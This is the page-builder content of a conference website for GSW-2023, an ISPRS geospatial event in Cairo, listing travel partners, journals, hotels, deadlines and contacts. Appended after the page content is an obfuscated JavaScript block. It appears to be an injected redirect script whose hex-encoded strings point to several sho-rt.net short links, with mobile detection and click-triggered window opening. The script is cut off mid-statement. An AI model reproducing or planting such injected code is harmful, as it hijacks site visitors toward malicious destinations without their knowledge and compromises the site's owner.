target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 